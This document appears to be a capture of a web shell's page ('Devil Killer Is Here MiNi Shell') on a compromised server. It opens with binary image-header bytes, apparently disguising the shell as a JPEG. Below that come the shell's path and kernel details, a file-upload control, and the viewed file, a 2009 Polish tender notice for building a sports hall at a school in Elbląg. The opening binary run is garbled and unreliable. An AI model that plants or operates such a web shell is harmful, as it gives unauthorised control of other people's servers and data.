JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128775-N-2009.html

<p class="kh_header"><b>Elbląg: Budowa hali sportowej przy Gimnazjum nr 9 w Elblągu</b><br>
<b>Numer ogłoszenia: 128775 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali sportowej przy Gimnazjum nr 9 w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Budowa hali sportowej przy Gimnazjum nr 9 w Elblągu.

przedmiot główny:
nazewnictwo wg CPV:   Roboty budowlane związane z halami sportowymi

Przedmiotem zamówienia są roboty budowlane związane z realizacją inwestycji p.n. Budowa hali sportowej przy Gimnazjum nr 9 w Elblągu.

2.	Przedmiot zamówienia opisuje niżej wymieniona dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych, opracowana przez firmę Projektowanie i Wykonawstwo Ogólnobudowlane dr inż. Jan Jakubowski z siedzibą w Łodzi przy ul. Wyszyńskiego 63/33, składająca się z:

A.	DOKUMENTACJA PROJEKTOWA:
	
1)  PRZEDMIARY ROBÓT:
a. NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: BUDOWLANA

b. Obiekt: BUDOWA HALI SPORTOWEJ WRAZ Z ZAPLECZEM PRZY GIMNAZJUM NR 9 
  W ELBLĄGU
		  Rodzaj opracowania: PRZYŁĄCZE SIECI CO
		  Adres inwestycji: 82-300 ELBLĄG UL. BROWARNA 1,
    działka nr 404

          c. Obiekt: BUDOWA HALI SPORTOWEJ WRAZ Z ZAPLECZEM PRZY GIMNAZJUM NR 9 
  W ELBLĄGU
		  Rodzaj opracowania: WĘZEŁ CO / CWU / WENT.
		  Adres inwestycji: 82-300 ELBLĄG UL. BROWARNA 1,
    działka nr 404

d. NAZWA INWESTYCJI: PB SALA SPORTOWA WIELODYSCYPLINARNA WRAZ Z   
 ZAPLECZEM SOCJALNYM
		  ADRES INWESTYCJI: Gimnazjum nr 9, Elbląg, ul. Browarna
		  BRANŻA: Nawierzchnie dróg i parkingów

e. NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: INSTALACJA CENTRALNEGO OGRZEWANIA

f. NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: INSTALACJA WENTYLACJI MECHANICZNEJ

g. NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: INSTALACJA WODOCIAGOWO - KANALIZACYJNA

h. PRZEDMIAR na wyposażenie sportowe SALI GIMNASTYCZNEJ PRZY GIMNAZJUM 
  W ELBLĄGU

i.  NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: PRZYŁĄCZE WOD.- KAN.

j.  NAZWA INWESTYCJI: HALA SPORTOWA PRZY GIMNAZJUM NR 9 W ELBLĄGU
		  ADRES INWESTYCJI: ELBLĄG, ul. BROWARNA 1
		  BRANŻA: ELEKTRYCZNA

     Zamawiający informuje, że przedmiary robót wymienione w sekcji II.1.3)  pkt 2.A.1) stanowią
     ZAŁĄCZNIK NR 5 do SIWZ.

                  2)  PROJEKTY:
	a. PROJEKT
	    PLAN ZAGOSPODAROWANIA DZIAŁKI
	    Nr działki 378/ 2, 404, 405, 406/8, 406/9
	    HALA SPORTOWA
	    w ELBLĄGU, ul. Browarna 1, przy Gimnazjum nr 9

	b. ARCHITEKTURA
 HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
 w ELBLĄGU, ul. Browarna 1

	c. KOLORYSTYKA OBIEKTU
 HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
 w ELBLĄGU, ul. Browarna 1

	d. KONSTRUKCJA CZ.I
 HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
 w ELBLĄGU, ul. Browarna 1

	e. KONSTRUKCJA CZ.II
 HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
 w ELBLĄGU, ul. Browarna 1

	f. PROJEKT BUDOWLANY
 Temat projektu: Wielodyscyplinarna Sala Sportowa z zapleczem socjalnym
                           Instalacja elektryczna
 Lokalizacja obiektu: Gimnazjum nr 9
	   Elbląg, ul. Browarna 1
 Branża: Elektryczna

	g. PROJEKT BUDOWLANY
 Temat: INSTALACJA WENTYLACJI MECHANICZNEJ
 Obiekt: WIELODYSCYPLINARNA HALA SPORTOWA WRAZ Z ZAPLECZEM 
	SOCJALNYM PRZY GIMNAZJUM NR 9, ELBLĄG, UL. BROWARNA NR 1
 
	h. PROJEKT BUDOWLANY
 Temat: INSTALACJA CENTRALNEGO OGRZEWANIA
 Obiekt: WIELODYSCYPLINARNA HALA SPORTOWA WRAZ Z ZAPLECZEM 
	SOCJALNYM PRZY GIMNAZJUM NR 9, ELBLĄG, UL. BROWARNA NR 1

	i. PROJEKT BUDOWLANY
 HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
 w ELBLĄGU, ul. Browarna 1
Rodzaj opracowania: Projekt budowlany
	   Węzeł cieplny c.o./c.w.u./went.
Obiekt: BUDOWA HALI SPORTOWEJ przy Gimnazjum nr 9 w Elblągu

	j. PROJEKT BUDOWLANY
PRZYŁĄCZA CIEPŁOWNICZEGO DO PROJEKTOWANEJ HALI SPORTOWEJ ORAZ 
GIMNAZJUM nr 9 W ELBLĄGU, ul. Browarna 1
Rodzaj opracowania: Projekt budowlany
	   Przyłącze sieci cieplnej
Obiekt: BUDOWA HALI SPORTOWEJ przy Gimnazjum nr 9 w Elblągu

	k. PROJEKT BUDOWLANY
 Temat: INSTALACJA WODOCIĄGOWO-KAZALIZACYJNE
 Obiekt: WIELODYSCYPLINARNA HALA SPORTOWA WRAZ Z ZAPLECZEM 
	SOCJALNYM PRZY GIMNAZJUM NR 9, ELBLĄG, UL. BROWARNA NR 1

	l. PROJEKT BUDOWLANY
Temat: PRZYŁĄCZE WODOCIĄGOWO-KANALIZACYJNE, WRAZ Z WYMIANĄ 
            PRZYŁĄCZA WODOCIĄGOWEGO O90 mm PCV
 Obiekt: WIELODYSCYPLINARNA HALA SPORTOWA WRAZ Z ZAPLECZEM 
	SOCJALNYM PRZY GIMNAZJUM NR 9, ELBLĄG, UL. BROWARNA, działka nr 405

	ł. PROJEKT BUDOWLANY
SALA SPORTOWA WIELODYSCYPLINARNA WRAZ Z ZAPLECZEM SOCJALNYM 
Lokalizacja: Gimnazjum nr 9
	      Elbląg, ul. Browarna
Branża: Nawierzchnie dróg i parkingów

                  3)  PLAN ZAGOSPODAROWANIA DZIAŁKI
	BOISKO SPORTOWE
	HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
	w ELBLĄGU, ul. Browarna 1

                  4)  PODSTAWOWE WYPOSAŻENIE SPORTOWE HALI SPORTOWEJ
	OPIS
	HALA SPORTOWA WRAZ Z ZAPLECZEM przy Gimnazjum nr 9
	w ELBLĄGU

                  5)  INFORMACJA DOTYCZĄCA PLANU BEZPIECZEŃSTWA I OCHRONY ZDROWIA 
	(zwana BIOZ)
	HALA SPORTOWA przy Gimnazjum nr 9 w Elblągu, ul. Browarna 1

Zamawiający informuje, że dokumentacja projektowa wymieniona w sekcji II.1.3) pkt 2.A.2) , 2.A.3), 2.A.4)  i 2.A.5) stanowi ZAŁĄCZNIK NR 6 do SIWZ.
 
B.   SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
1) SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH I 
BRANŻOWYCH
	HALA SPORTOWA WRAZ Z ZAPLECZEM SOCJALNYM w ELBLĄGU

2) SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH
	HALA SPORTOWA WRAZ Z ZAPLECZEM SOCJALNYM W ELBLĄGU
	WĘZEŁ CIEPLNY C.O./C.W.U./WENT.

3) SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH
	HALA SPORTOWA WRAZ Z ZAPLECZEM SOCJALNYM W ELBLĄGU
	PRZYŁĄCZE SIECI CIEPLNEJ

       Zamawiający informuje, że specyfikacje techniczne wykonania i odbioru robót budowlanych, o 
	    których mowa w sekcji II.1.3) pkt 2.B. stanowi ZAŁĄCZNIK NR 7 do SIWZ.

3.	Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na okres 39 miesięcy licząc od daty odbioru robót.

4.	Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej w celu zapoznania się z warunkami wykonania prac.

5.	W przypadku dostarczenia zabezpieczenia należytego wykonania umowy w formie gwarancji, Zamawiający wymaga, aby były one zgodne ze wzorami stanowiącymi ZAŁĄCZNIK NR 4 do SIWZ.

6.	W przypadku wygrania przetargu Wykonawca sporządzi:
- szczegółowe kosztorysy robót objętych zamówieniem i przedłoży w terminie 7 dni od daty 
  udzielenia zamówienia,
- harmonogram rzeczowo-finansowy wykonania robót objętych zamówieniem i przedłoży do 
  zatwierdzenia w terminie 10 dni od daty udzielenia zamówienia.

7.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 6471 - Kodeksu Cywilnego.

8.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do zawarcia umów przelewu wierzytelności na rzecz podwykonawców, należnych im za wykonane roboty.

9.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej.
Zamawiający wymaga, aby Wykonawca przed przystąpieniem do wykonania przedmiotu zamówienia przedłożył polisy lub inne dokumenty, potwierdzające zawarcie ubezpieczenia na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
a)	ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
b)	ubezpieczenie osób trzecich.

10.	 W pozycjach opisujących przedmiot zamówienia przez wskazanie znaków towarowych patentów lub pochodzenia Zamawiający dopuszcza zastosowanie rozwiązań równoważnych o parametrach technicznych nie gorszych niż wskazane przez Zamawiającego.
W dokumentacji projektowej przyjęto ze względów technicznych (konieczność wykonania obliczeń i prawidłowego doboru) konkretne wyroby na które Wykonawca może stosować wyroby zamienne pod warunkiem, że są równoważne technicznie, spełniają wymagania norm i przepisów oraz założone parametry projektowe.
Wykonawca, który powołuje się  na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego. W związku z powyższym Zamawiający wymaga, aby Wykonawca w kosztorysach ofertowych wskazał i opisał za pomocą parametrów technicznych i jakościowych rozwiązania, które oferuje Zamawiającemu jako równoważne do opisanych przez Zamawiającego w dokumentacji projektowo-kosztorysowej.
Zamawiający oceniając, czy podane przez Wykonawcę rozwiązania są równoważne będzie porównywał parametry techniczne opisane przez Zamawiającego w dokumentacji projektowo-kosztorysowej i wskazane przez Wykonawcę.

11.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści
 oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
1)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której będzie dokonany wybór Wykonawcy.
2)	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a.	konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkody    
atmosferyczne o charakterze katastrof).
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę.
     - z przyczyn niezależnych od Zamawiającego, tj. z powodu nadzwyczajnych zdarzeń    
  gospodarczych, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy.
b.	ograniczenie zakresu robót wynikających z wprowadzenia zmian istotnych lub nieistotnych 
w rozumieniu Prawa budowlanego w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu zamówienia.
c.	konieczność zmiany terminu umownego i harmonogramu realizacji robót z powodu:
- konieczności wykonania dodatkowych badań, ekspertyz, analiz itp. 
 - zmiany wymagań związanych ze zmianą lub wydaniem nowego pozwolenia na budowę dla 
realizowanego zamówienia, wynikających z konieczności wykonania robót zamiennych, niewykraczających poza zakres przedmiotu zamówienia, a koniecznych dla wykonania całości robót i uzyskania założonego efektu użytkowego,
     - zmiany przepisów, które skutkują zmianą pozwolenia na budowę wydanego dla 
       realizowanego zamówienia,
     - konieczności wykonania prac wynikających z zaleceń organów uprawnionych np. Nadzoru 
       budowlanego, PIP, itp. 
d.	zwiększenie lub zmniejszenie ilości robót wynikających z rzeczywistych obmiarów, które powodują zmianę wartości umownej,
e.	zmiana inspektorów nadzoru, kierownika budowy w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego, 
f.	zmiana Podwykonawców robót w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego,
g.	zmiana nr konta Wykonawcy lub innych danych podmiotowych.
3)	W przypadku żądania przedłużenia terminu umownego z przyczyn zależnych od Wykonawcy, zostanie przeprowadzona następująca procedura:
- Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie 
co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
-  Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
4)	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy. 

12.	  Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.

13.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

14.	Zakres zamówienia.
Zakres robót obejmuje: 
1)	budowę hali sportowej wraz z zapleczem:
	dane obiektu:
	- długość      70,70 m
	- szerokość  38,90 m
	- wysokość        10,85 m
	- ilość kondygnacji   1
	- kubatura  ok. 10 856,00 m3
	- powierzchnia użytkowa 1 907,70 m2
	- powierzchnia całkowita 2 099,00 m2
	- powierzchnia zabudowy ok. 2 144,00 m2
	w tym:
	a)  budynku hali, będącego budynkiem wolnostojącym, parterowym, niepodpiwniczonym o 
konstrukcji stalowej, szkieletowo - łukowej, połączonego łącznikiem z istniejącym budynkiem szkolnym,
		dane budynku hali:
		- długość  45,00 m
		- szerokość 24,72 m
		- wysokość 10,85 m
		- kubatura  ok. 7830,00 m3
		- powierzchnia  1089,00 m2
	b)  zaplecza hali sportowej, będącego budynkiem jednokondygnacyjnym zaprojektowanym jako 
		budynek przyległy wzdłuż trzech boków hali w kształcie litery C, w konstrukcji tradycyjnej,
2)   budowę instalacji: wody zimnej, wody ciepłej, kanalizacji sanitarnej, kanalizacji deszczowej, 
	centralnego ogrzewania, węzła c.o., wentylacji mechanicznej, elektrycznej, odgromowej,
3)	budowę przyłączy: wodociągowego, kanalizacji sanitarnej, kanalizacji deszczowej, cieplnego,
4)	zagospodarowanie terenu: budowę boiska sportowego o wymiarach 44,0x22,0 m, budowę 
	chodników, parkingów, placów manewrowych, wykonanie trawników, nasadzenie zieleni.

Szczegółowy zakres robót do wykonania określa dokumentacja projektowa stanowiąca ZAŁĄCZNIK NR 6 do SIWZ, specyfikacje techniczne wykonania i odbioru robót budowlanych stanowiące ZAŁĄCZNIK NR 7 do SIWZ oraz przedmiary robót stanowiące ZAŁĄCZNIK NR 5 do SIWZ.




Zamawiający wymaga złożenia oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych o treści:
Zgodnie z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych oświadczam, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:

150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych)

Wadium należy wnieść przed upływem terminu składania ofert.

	Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-  w pieniądzu, 
-  w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-  w gwarancjach bankowych, 
-  w gwarancjach ubezpieczeniowych, 
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158, z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy

NR  95116022020000000061913418   w  Banku Millennium S.A. O / Elbląg

Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w sekretariacie Wydziału Finansowo - Budżetowego Urzędu Miejskiego w Elblągu.

2.	Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
     Warunkiem udziału w postępowaniu jest:
a)  wykonanie w sposób należyty w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj. wykonanie:
  - co najmniej 1 roboty budowlanej polegającej na budowie hali sportowej o kubaturze co najmniej 
	 6 000 m3, 
oraz
  - co najmniej 1 roboty budowlanej polegającej na budowie co najmniej 1 budynku użyteczności 
	publicznej o kubaturze co najmniej 8 000 m3, 

		Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, tj. liczba wykonanych robót, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn. że np. jeden z Wykonawców wspólnie ubiegających się może wykazać wykonanie 1 roboty budowlanej polegającej na budowie hali sportowej o kubaturze co najmniej 6 000 m3, a drugi z Wykonawców wspólnie ubiegających się może wykazać wykonanie 1 roboty budowlanej polegającej na budowie co najmniej 1 budynku użyteczności publicznej o kubaturze co najmniej 8 000 m3. Natomiast nie podlega sumowaniu kubatura podana w warunku.

b)	   dysponowanie kierownikiem budowy branży ogólnobudowlanej ze stażem łącznym pracy jako 
kierownik budowy minimum 5 lat oraz kierownikami robót branżowych tj. robót elektrycznych, sanitarnych, drogowych, z których każdy ma łączny staż pracy jako kierownik robót minimum 3 lata.

Zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane, samodzielne funkcje techniczne w budownictwie, m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego (tekst jednolity: Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.).

Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18.03.2008 o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394).

c)   zatrudnianie przeciętnie w okresie ostatnich trzech lat minimum 50 pracowników,

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3.  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
     Warunkiem udziału w postępowaniu jest:
